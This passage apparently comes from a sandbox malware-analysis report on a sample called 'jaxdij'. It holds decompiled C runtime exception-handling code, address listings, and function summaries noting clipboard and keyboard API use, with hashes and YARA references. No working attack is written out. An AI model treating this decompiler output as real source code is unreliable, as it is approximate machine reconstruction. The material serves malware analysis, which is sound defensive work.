																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E0025785D( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_t82 =  &_v104; // 0x257852
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0024DC95(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E00251CAE(_t202, _t204, _t216, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E00257682();
																_t204 = _t202;
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, _t225) + 0x10)) = _t202;
																	_t169 = E00251CAE(_t202, _t204, _t216, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, _t225) + 0x1c));
										_t196 = E00251CAE(_t202, _t204, _t216, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E00257682();
										_t206 = _t202;
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E002511BB(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E0025744A( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0x2648c0) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E0024DC95(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E00257406( &_v64);
											E00258D45( &_v64, 0x26328c);
											L64:
											 *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, _t225) + 0x10)) = _t202;
											_t163 = E00251CAE(_t202, _t204, _t216, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E0025429E(_t204, _t225, _t202);
											L0025735A(_a8, _a16, _t218);
											_t166 = E00257372(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E0025771C(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}



























































                                                                                                                          0x00257ac2
                                                                                                                          0x00257acb
                                                                                                                          0x00257ad4
                                                                                                                          0x00257ada
                                                                                                                          0x00257ae2
                                                                                                                          0x00257ae4
                                                                                                                          0x00257ae7
                                                                                                                          0x00257aed
                                                                                                                          0x00257e61
                                                                                                                          0x00257e61
                                                                                                                          0x00257e66
                                                                                                                          0x00257e6a
                                                                                                                          0x00257e6e
                                                                                                                          0x00257e6f
                                                                                                                          0x00257e72
                                                                                                                          0x00257e73
                                                                                                                          0x00257e74
                                                                                                                          0x00257e77
                                                                                                                          0x00257e79
                                                                                                                          0x00257e7c
                                                                                                                          0x00257e7d
                                                                                                                          0x00257e7e
                                                                                                                          0x00257e81
                                                                                                                          0x00257e86
                                                                                                                          0x00257e86
                                                                                                                          0x00257e89
                                                                                                                          0x00257e8c
                                                                                                                          0x00257e8e
                                                                                                                          0x00257e90
                                                                                                                          0x00257e90
                                                                                                                          0x00257e96
                                                                                                                          0x00257e9b
                                                                                                                          0x00257e9e
                                                                                                                          0x00257ea0
                                                                                                                          0x00257ea3
                                                                                                                          0x00257ea6
                                                                                                                          0x00257ea7
                                                                                                                          0x00257eb5
                                                                                                                          0x00257eba
                                                                                                                          0x00257ebf
                                                                                                                          0x00257ec2
                                                                                                                          0x00257ec5
                                                                                                                          0x00257ec8
                                                                                                                          0x00257ecb
                                                                                                                          0x00257ecc
                                                                                                                          0x00257ecf
                                                                                                                          0x00257ed7
                                                                                                                          0x00257ed9
                                                                                                                          0x00257edd
                                                                                                                          0x00000000
                                                                                                                          0x00257edd
                                                                                                                          0x00257ee6
                                                                                                                          0x00257afc
                                                                                                                          0x00257afc
                                                                                                                          0x00257b05
                                                                                                                          0x00257c02
                                                                                                                          0x00257c02
                                                                                                                          0x00257c05
                                                                                                                          0x00000000
                                                                                                                          0x00257b34
                                                                                                                          0x00257b34
                                                                                                                          0x00257b39
                                                                                                                          0x00000000
                                                                                                                          0x00257b3f
                                                                                                                          0x00257b3f
                                                                                                                          0x00257b47
                                                                                                                          0x00257dff
                                                                                                                          0x00257dff
                                                                                                                          0x00257b4d
                                                                                                                          0x00257b52
                                                                                                                          0x00257b55
                                                                                                                          0x00257b5a
                                                                                                                          0x00257b61
                                                                                                                          0x00257b66
                                                                                                                          0x00000000
                                                                                                                          0x00257b9e
                                                                                                                          0x00257ba6
                                                                                                                          0x00257c0a
                                                                                                                          0x00257c0a
                                                                                                                          0x00257c0d
                                                                                                                          0x00257c10
                                                                                                                          0x00257c12
                                                                                                                          0x00257c15
                                                                                                                          0x00257c18
                                                                                                                          0x00257c1e
                                                                                                                          0x00257dca
                                                                                                                          0x00257dca
                                                                                                                          0x00257dcd
                                                                                                                          0x00000000
                                                                                                                          0x00257dcf
                                                                                                                          0x00257dcf
                                                                                                                          0x00257dd2
                                                                                                                          0x00000000
                                                                                                                          0x00257dd8
                                                                                                                          0x00257de8
                                                                                                                          0x00257ded
                                                                                                                          0x00000000
                                                                                                                          0x00257ded
                                                                                                                          0x00257dd2
                                                                                                                          0x00257c24
                                                                                                                          0x00257c24
                                                                                                                          0x00257c28
                                                                                                                          0x00000000
                                                                                                                          0x00257c2e
                                                                                                                          0x00257c2e
                                                                                                                          0x00257c35
                                                                                                                          0x00257c4d
                                                                                                                          0x00257c4d
                                                                                                                          0x00257c50
                                                                                                                          0x00257c53
                                                                                                                          0x00257c69
                                                                                                                          0x00257c6e
                                                                                                                          0x00257c71
                                                                                                                          0x00257c74
                                                                                                                          0x00257c77
                                                                                                                          0x00257c7a
                                                                                                                          0x00257c7d
                                                                                                                          0x00257c80
                                                                                                                          0x00257c86
                                                                                                                          0x00257c86
                                                                                                                          0x00257c89
                                                                                                                          0x00257c8c
                                                                                                                          0x00257c8e
                                                                                                                          0x00257c9b
                                                                                                                          0x00257c9c
                                                                                                                          0x00257c9c
                                                                                                                          0x00257c9e
                                                                                                                          0x00257ca1
                                                                                                                          0x00257ca7
                                                                                                                          0x00257caa
                                                                                                                          0x00257cb0
                                                                                                                          0x00257cb2
                                                                                                                          0x00257cb5
                                                                                                                          0x00257cb8
                                                                                                                          0x00257cbe
                                                                                                                          0x00257cc1
                                                                                                                          0x00257cc6
                                                                                                                          0x00257cc6
                                                                                                                          0x00257cc9
                                                                                                                          0x00257ccc
                                                                                                                          0x00257ccf
                                                                                                                          0x00257cd2
                                                                                                                          0x00257cd5
                                                                                                                          0x00257cda
                                                                                                                          0x00257cdb
                                                                                                                          0x00257cdc
                                                                                                                          0x00257cdd
                                                                                                                          0x00257cde
                                                                                                                          0x00257ce1
                                                                                                                          0x00257ce4
                                                                                                                          0x00257ce6
                                                                                                                          0x00000000
                                                                                                                          0x00257ce8
                                                                                                                          0x00257ce8
                                                                                                                          0x00257cef
                                                                                                                          0x00257cf4
                                                                                                                          0x00257cf7
                                                                                                                          0x00257cf9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257cfb
                                                                                                                          0x00257cfe
                                                                                                                          0x00257cff
                                                                                                                          0x00257d02
                                                                                                                          0x00257d04
                                                                                                                          0x00000000
                                                                                                                          0x00257d06
                                                                                                                          0x00257d06
                                                                                                                          0x00257d09
                                                                                                                          0x00000000
                                                                                                                          0x00257d09
                                                                                                                          0x00000000
                                                                                                                          0x00257d04
                                                                                                                          0x00257d1d
                                                                                                                          0x00257d20
                                                                                                                          0x00257d23
                                                                                                                          0x00257d26
                                                                                                                          0x00257d29
                                                                                                                          0x00257d2d
                                                                                                                          0x00257d32
                                                                                                                          0x00257d33
                                                                                                                          0x00257d36
                                                                                                                          0x00257d39
                                                                                                                          0x00257d3c
                                                                                                                          0x00257d3f
                                                                                                                          0x00257d40
                                                                                                                          0x00257d45
                                                                                                                          0x00257d45
                                                                                                                          0x00257d48
                                                                                                                          0x00257d48
                                                                                                                          0x00000000
                                                                                                                          0x00257d0c
                                                                                                                          0x00257d0c
                                                                                                                          0x00257d0d
                                                                                                                          0x00257d10
                                                                                                                          0x00257d13
                                                                                                                          0x00257d16
                                                                                                                          0x00257d16
                                                                                                                          0x00000000
                                                                                                                          0x00257d1b
                                                                                                                          0x00257cb8
                                                                                                                          0x00257caa
                                                                                                                          0x00257d4b
                                                                                                                          0x00257d4e
                                                                                                                          0x00257d4f
                                                                                                                          0x00257d52
                                                                                                                          0x00257d55
                                                                                                                          0x00257d58
                                                                                                                          0x00257d5b
                                                                                                                          0x00257d5b
                                                                                                                          0x00257d64
                                                                                                                          0x00257d67
                                                                                                                          0x00257d67
                                                                                                                          0x00257c80
                                                                                                                          0x00257d6a
                                                                                                                          0x00257d6e
                                                                                                                          0x00257d70
                                                                                                                          0x00257d73
                                                                                                                          0x00257d79
                                                                                                                          0x00257d79
                                                                                                                          0x00257d81
                                                                                                                          0x00257d86
                                                                                                                          0x00257df0
                                                                                                                          0x00257df0
                                                                                                                          0x00257df5
                                                                                                                          0x00257df9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257d88
                                                                                                                          0x00257d8b
                                                                                                                          0x00257d8e
                                                                                                                          0x00257d92
                                                                                                                          0x00257da0
                                                                                                                          0x00257da2
                                                                                                                          0x00257db9
                                                                                                                          0x00257dbd
                                                                                                                          0x00257dc3
                                                                                                                          0x00257dc4
                                                                                                                          0x00257dc6
                                                                                                                          0x00000000
                                                                                                                          0x00257dc8
                                                                                                                          0x00000000
                                                                                                                          0x00257dc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257d94
                                                                                                                          0x00257d94
                                                                                                                          0x00257d96
                                                                                                                          0x00000000
                                                                                                                          0x00257d98
                                                                                                                          0x00257d98
                                                                                                                          0x00257d9c
                                                                                                                          0x00000000
                                                                                                                          0x00257d9e
                                                                                                                          0x00257da4
                                                                                                                          0x00257da9
                                                                                                                          0x00257dac
                                                                                                                          0x00257db1
                                                                                                                          0x00257db4
                                                                                                                          0x00000000
                                                                                                                          0x00257db4
                                                                                                                          0x00257d9c
                                                                                                                          0x00257d96
                                                                                                                          0x00257d92
                                                                                                                          0x00257c37
                                                                                                                          0x00257c37
                                                                                                                          0x00257c3e
                                                                                                                          0x00000000
                                                                                                                          0x00257c40
                                                                                                                          0x00257c40
                                                                                                                          0x00257c47
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257c47
                                                                                                                          0x00257c3e
                                                                                                                          0x00257c35
                                                                                                                          0x00257c28
                                                                                                                          0x00257ba8
                                                                                                                          0x00257bb0
                                                                                                                          0x00257bb3
                                                                                                                          0x00257bb8
                                                                                                                          0x00257bbc
                                                                                                                          0x00257bbf
                                                                                                                          0x00257bc5
                                                                                                                          0x00257bc8
                                                                                                                          0x00000000
                                                                                                                          0x00257bca
                                                                                                                          0x00257bca
                                                                                                                          0x00257bcd
                                                                                                                          0x00257bcf
                                                                                                                          0x00257e00
                                                                                                                          0x00257e00
                                                                                                                          0x00000000
                                                                                                                          0x00257bd5
                                                                                                                          0x00257bdd
                                                                                                                          0x00257be8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257bf1
                                                                                                                          0x00257bf4
                                                                                                                          0x00257bf5
                                                                                                                          0x00257bf8
                                                                                                                          0x00257bfa
                                                                                                                          0x00000000
                                                                                                                          0x00257c00
                                                                                                                          0x00000000
                                                                                                                          0x00257c00
                                                                                                                          0x00000000
                                                                                                                          0x00257bfa
                                                                                                                          0x00257bd5
                                                                                                                          0x00257e05
                                                                                                                          0x00257e05
                                                                                                                          0x00257e07
                                                                                                                          0x00257e08
                                                                                                                          0x00257e0f
                                                                                                                          0x00257e12
                                                                                                                          0x00257e20
                                                                                                                          0x00257e25
                                                                                                                          0x00257e2a
                                                                                                                          0x00257e2d
                                                                                                                          0x00257e32
                                                                                                                          0x00257e35
                                                                                                                          0x00257e38
                                                                                                                          0x00257e3a
                                                                                                                          0x00257e3c
                                                                                                                          0x00257e3c
                                                                                                                          0x00257e41
                                                                                                                          0x00257e4d
                                                                                                                          0x00257e53
                                                                                                                          0x00257e58
                                                                                                                          0x00257e5b
                                                                                                                          0x00257e5c
                                                                                                                          0x00000000
                                                                                                                          0x00257e5c
                                                                                                                          0x00257bc8
                                                                                                                          0x00257ba6
                                                                                                                          0x00257b66
                                                                                                                          0x00257b47
                                                                                                                          0x00257b39
                                                                                                                          0x00257b05

                                                                                                                          APIs
                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00257BE1
                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00257CEF
                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 00257D40
                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00257E41
                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00257E5C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                          • String ID: Rx%$csm$csm$csm
                                                                                                                          • API String ID: 4119006552-2066523457
                                                                                                                          • Opcode ID: 3831f83fb4dd906a5c4b95fd054869aec6eee5ce467ff3644890442edf847f86
                                                                                                                          • Instruction ID: 432d989068c1629783cede6be2a920b4c0851a4c36981083d83268c52c41abe9
                                                                                                                          • Opcode Fuzzy Hash: 3831f83fb4dd906a5c4b95fd054869aec6eee5ce467ff3644890442edf847f86
                                                                                                                          • Instruction Fuzzy Hash: 52B18C3186420ADFCF25DFA4E8819AEB7B5BF14312F14409AEC016B212D371DA79CF99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024AA40 Relevance: 12.2, APIs: 8, Instructions: 181clipboardmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardGlobal$AllocEmptyLockOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3590494090-0
                                                                                                                          • Opcode ID: f15c825e35aeb9c38da8833ae6f5b227c830edac7c241035fdc5bd3086d57b30
                                                                                                                          • Instruction ID: bf82a197f144be3c9828e9c850175be4fb1e55c31f37f2b438264b5c2c333988
                                                                                                                          • Opcode Fuzzy Hash: f15c825e35aeb9c38da8833ae6f5b227c830edac7c241035fdc5bd3086d57b30
                                                                                                                          • Instruction Fuzzy Hash: 6B81F374A102199FCB08DFA8D588AADBBF0FF08315F148469E845EB351E774E990CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024A290 Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CaretFocusInvertRect$HideReleaseShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1353628544-0
                                                                                                                          • Opcode ID: 66fe80f7acc1ba43b497c9fed7023cecf52c2b881d424018d3fc1b46962fe2dd
                                                                                                                          • Instruction ID: 144c1896cdadc3bd994b72b0bc70e647fd129589ed7d1fbc124933bf42f0cdf1
                                                                                                                          • Opcode Fuzzy Hash: 66fe80f7acc1ba43b497c9fed7023cecf52c2b881d424018d3fc1b46962fe2dd
                                                                                                                          • Instruction Fuzzy Hash: 8561C474A04209CFCB08DF68D188AAEBBB1BF48311F158469E849DB351E774ED95CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024ACE0 Relevance: 12.1, APIs: 8, Instructions: 98clipboardkeyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardGlobal$CloseDataLockOpenScanSizeUnlockVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1615112705-0
                                                                                                                          • Opcode ID: fbf0b6c29bef8532a98e013d860cdda6cb34f33ba566f3658ff4a683fb3ea308
                                                                                                                          • Instruction ID: 47c3903bb0943f40f61db8b5db386c394b0af8203d64a84a4a5d2fce4fc1742c
                                                                                                                          • Opcode Fuzzy Hash: fbf0b6c29bef8532a98e013d860cdda6cb34f33ba566f3658ff4a683fb3ea308
                                                                                                                          • Instruction Fuzzy Hash: 2841E4B4914208EFDB04EFA8E5897ADBBF0FF04304F008469E895E7350E775A5A4DB56
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002429C0 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateEvent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2692171526-0
                                                                                                                          • Opcode ID: 0124ca50fff1e4e66275d7ec1fc25e88e67500169a4ae07d5563d009091b72b8
                                                                                                                          • Instruction ID: 8534fc58f58294105d18b4348bc9a31b314ac25794acb584d6ba956e9a7fddfe
                                                                                                                          • Opcode Fuzzy Hash: 0124ca50fff1e4e66275d7ec1fc25e88e67500169a4ae07d5563d009091b72b8
                                                                                                                          • Instruction Fuzzy Hash: 1891FBB0918205DFDB08DFA9D0887AEBBF0FB44314F50C92EE85597290D7B49598CF92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024DF10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E0024DF10(void* __ebx, void* __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __edi;
				void* __esi;
				signed int _t1005;
				signed int _t1012;
				intOrPtr _t1013;
				void* _t1014;
				signed char* _t1015;
				intOrPtr _t1017;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1025;
				signed int _t1028;
				signed int _t1032;
				signed char _t1049;
				signed char _t1052;
				signed char _t1053;
				signed char _t1054;
				signed char _t1055;
				signed char _t1056;
				signed int _t1245;
				intOrPtr* _t1249;
				intOrPtr _t1250;
				void* _t1252;
				signed int _t1256;
				char _t1258;
				signed int _t1262;
				signed int _t1263;
				signed int _t1270;
				signed char* _t1336;
				signed char* _t1337;
				signed char* _t1338;
				signed char* _t1339;
				signed char* _t1340;
				void* _t1341;
				intOrPtr _t1342;
				signed int _t1344;
				intOrPtr _t1347;
				signed char* _t1350;
				signed char* _t1351;
				signed char* _t1352;
				signed char* _t1353;
				signed char* _t1354;
				signed int _t1355;
				void* _t1358;
				void* _t1359;
				void* _t1365;

				_t1333 = __edx;
				_t1249 = _a4;
				_push(_t1341);
				_v5 = 0;
				_v16 = 1;
				 *_t1249 = E0025AEE1(__ecx,  *_t1249);
				_t1250 = _a8;
				_t6 = _t1250 + 0x10; // 0x11
				_t1347 = _t6;
				_push(_t1347);
				_v20 = _t1347;
				_v12 =  *(_t1250 + 8) ^  *0x264050;
				E0024DED0(_t1250, __edx, _t1341, _t1347,  *(_t1250 + 8) ^  *0x264050);
				E00252117(_a12);
				_t1005 = _a4;
				_t1359 = _t1358 + 0x10;
				_t1342 =  *((intOrPtr*)(_t1250 + 0xc));
				if(( *(_t1005 + 4) & 0x00000066) != 0) {
					__eflags = _t1342 - 0xfffffffe;
					if(_t1342 != 0xfffffffe) {
						_t1333 = 0xfffffffe;
						E00252100(_t1250, 0xfffffffe, _t1347, 0x264050);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t1005;
					_v28 = _a12;
					 *((intOrPtr*)(_t1250 - 4)) =  &_v32;
					if(_t1342 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t1256 = _v12;
							_t1012 = _t1342 + (_t1342 + 2) * 2;
							_t1250 =  *((intOrPtr*)(_t1256 + _t1012 * 4));
							_t1013 = _t1256 + _t1012 * 4;
							_t1257 =  *((intOrPtr*)(_t1013 + 4));
							_v24 = _t1013;
							if( *((intOrPtr*)(_t1013 + 4)) == 0) {
								_t1258 = _v5;
								goto L7;
							} else {
								_t1333 = _t1347;
								_t1014 = E002520A0(_t1257, _t1347);
								_t1258 = 1;
								_v5 = 1;
								_t1365 = _t1014;
								if(_t1365 < 0) {
									_v16 = 0;
									L13:
									_push(_t1347);
									E0024DED0(_t1250, _t1333, _t1342, _t1347, _v12);
									goto L14;
								} else {
									if(_t1365 > 0) {
										_t1015 = _a4;
										__eflags =  *_t1015 - 0xe06d7363;
										if( *_t1015 == 0xe06d7363) {
											__eflags =  *0x25c628;
											if(__eflags != 0) {
												_t1245 = E00251EF0(__eflags, 0x25c628);
												_t1359 = _t1359 + 4;
												__eflags = _t1245;
												if(_t1245 != 0) {
													_t1355 =  *0x25c628; // 0x24dc95
													 *0x267000(_a4, 1);
													 *_t1355();
													_t1347 = _v20;
													_t1359 = _t1359 + 8;
												}
												_t1015 = _a4;
											}
										}
										_t1334 = _t1015;
										E002520E0(_t1015, _a8, _t1015);
										_t1017 = _a8;
										__eflags =  *((intOrPtr*)(_t1017 + 0xc)) - _t1342;
										if( *((intOrPtr*)(_t1017 + 0xc)) != _t1342) {
											_t1334 = _t1342;
											E00252100(_t1017, _t1342, _t1347, 0x264050);
											_t1017 = _a8;
										}
										_push(_t1347);
										 *((intOrPtr*)(_t1017 + 0xc)) = _t1250;
										E0024DED0(_t1250, _t1334, _t1342, _t1347, _v12);
										E002520C0();
										asm("int3");
										_push(_t1347);
										_push(_t1342);
										_t1344 = _v32;
										_t1020 = _t1344;
										__eflags = _t1020;
										if(_t1020 == 0) {
											_t1021 = 0;
											__eflags = 0;
										} else {
											_t1022 = _t1020 - 1;
											__eflags = _t1022;
											if(_t1022 == 0) {
												_t1262 =  *_v0 & 0x000000ff;
												_t1025 =  *_a4 & 0x000000ff;
												goto L511;
											} else {
												_t1028 = _t1022 - 1;
												__eflags = _t1028;
												if(_t1028 == 0) {
													_t1336 = _v0;
													_t1350 = _a4;
													_t1263 = ( *_t1336 & 0x000000ff) - ( *_t1350 & 0x000000ff);
													__eflags = _t1263;
													if(_t1263 != 0) {
														__eflags = _t1263;
														_t993 = _t1263 > 0;
														__eflags = _t993;
														_t1263 = (0 | _t993) * 2 - 1;
													}
													__eflags = _t1263;
													if(_t1263 != 0) {
														goto L513;
													} else {
														_t1262 = _t1336[1] & 0x000000ff;
														_t1025 = _t1350[1] & 0x000000ff;
														goto L511;
													}
													goto L528;
												} else {
													_t1032 = _t1028 - 1;
													__eflags = _t1032;
